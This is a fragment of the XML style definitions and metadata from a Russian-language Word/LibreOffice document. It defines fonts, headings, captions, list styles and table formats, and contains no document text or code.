    <w:qFormat/>
    <w:rsid w:val="00c53ada"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="2" w:customStyle="1">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="3" w:customStyle="1">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="4" w:customStyle="1">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="5" w:customStyle="1">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="6" w:customStyle="1">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00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7" w:customStyle="1">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="8" w:customStyle="1">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9" w:customStyle="1">
    <w:name w:val="Заголовок 9 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="005e4f2a"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:themeColor="accent2" w:val="C0504D"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style6" w:customStyle="1">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="E-mailSignature"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f67ac2"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f67ac2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semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="004b37e8"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:themeColor="accent2" w:val="C0504D"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style7" w:customStyle="1">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00c5031d"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr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d60f71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr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d60f71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locked/>
    <w:rsid w:val="00917645"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style10" w:customStyle="1">
    <w:name w:val="Название объекта Знак"/>
    <w:link w:val="Caption"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:themeColor="accent1" w:val="4F81BD"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11" w:customStyle="1">
    <w:name w:val="Основной текст Знак1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:fill="FFFFFF" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style11" w:customStyle="1">
    <w:name w:val="Основной текст + Курсив"/>
    <w:basedOn w:val="11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shd w:fill="FFFFFF" w:val="clear"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style12" w:customStyle="1">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style13" w:customStyle="1">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Style29"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:fill="FFFFFF" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1pt" w:customStyle="1">
    <w:name w:val="Основной текст + Интервал 1 pt"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:fill="FFFFFF" w:val="clear"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="61" w:customStyle="1">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f74364"/>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:hAnsi="MS Mincho" w:eastAsia="MS Mincho" w:cs="MS Mincho"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:fill="FFFFFF" w:val="clear"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style14" w:customStyle="1">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:basedOn w:val="Style13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fill="FFFFFF" w:val="clear"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style15" w:customStyle="1">
    <w:name w:val="Текст сноски Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00e2203b"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/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locked/>
    <w:rsid w:val="00e2203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3429d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locked/>
    <w:rsid w:val="009233b7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fb7037"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="cm-keyword" w:customStyle="1">
    <w:name w:val="cm-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-variable" w:customStyle="1">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-def" w:customStyle="1">
    <w:name w:val="cm-def"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-property" w:customStyle="1">
    <w:name w:val="cm-property"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-string" w:customStyle="1">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-operator" w:customStyle="1">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-builtin" w:customStyle="1">
    <w:name w:val="cm-builtin"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="cm-number" w:customStyle="1">
    <w:name w:val="cm-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00fb7037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11"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00f74364"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:lineRule="exact" w:line="223"/>
      <w:ind w:hanging="2140"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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link w:val="Style10"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="20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99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="0093477c"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4F81BD" w:themeColor="accent1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tyle16" w:customStyle="1">
    <w:name w:val="Название рисунка"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:keepLines/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style17" w:customStyle="1">
    <w:name w:val="Название таблицы"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style18" w:customStyle="1">
    <w:name w:val="Программный код"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style19" w:customStyle="1">
    <w:name w:val="Текст внутри таблицы"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style20" w:customStyle="1">
    <w:name w:val="НИР нумерованный список"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="002e373a"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="-" w:customStyle="1">
    <w:name w:val="НИР-простой список"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00ae243b"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="284" w:leader="none"/>
        <w:tab w:val="right" w:pos="9912" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="100" w:after="0"/>
      <w:ind w:hanging="284" w:left="284"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00ae243b"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="993" w:leader="none"/>
        <w:tab w:val="right" w:pos="9912" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="100"/>
      <w:ind w:hanging="567" w:left="851"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00ae243b"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="1843" w:leader="none"/>
        <w:tab w:val="right" w:pos="9912" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="100"/>
      <w:ind w:hanging="851" w:left="1843"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="E-mailSignature">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f67ac2"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style21" w:customStyle="1">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Style16"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00c5031d"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style22" w:customStyle="1">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style23" w:customStyle="1">
    <w:name w:val="Список_ТИРЕ"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style24" w:customStyle="1">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="Style23"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style25" w:customStyle="1">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="Style24"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21" w:customStyle="1">
    <w:name w:val="Список_2_уровня"/>
    <w:basedOn w:val="Style24"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style26" w:customStyle="1">
    <w:name w:val="Список источников"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left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locked/>
    <w:rsid w:val="00d60f7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9"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00d60f7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qFormat/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style27" w:customStyle="1">
    <w:name w:val="_Название рисунка"/>
    <w:basedOn w:val="Caption"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="120" w:after="0"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b w:val="false"/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style28" w:customStyle="1">
    <w:name w:val="_Рисунок"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style29" w:customStyle="1">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style13"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00f74364"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:lineRule="atLeast" w:line="240"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="62" w:customStyle="1">
    <w:name w:val="Основной текст (6)"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="61"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00f74364"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:lineRule="exact" w:line="248"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:hAnsi="MS Mincho" w:eastAsia="MS Mincho" w:cs="MS Mincho" w:hAnsiTheme="minorHAnsi"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="Footnote Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style15"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00e2203b"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00fb703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msonormal" w:customStyle="1">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00eb5ef2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numbering" w:styleId="22" w:customStyle="1">
    <w:name w:val="_Маркированный2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00917645"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="a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ветлая заливка1"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="004b37e8"/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4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00475c3d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LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>21</Pages>
  <Words>2490</Words>
  <Characters>19152</Characters>
  <CharactersWithSpaces>22719</CharactersWithSpaces>
  <Paragraphs>338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2025-04-28T08:17:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
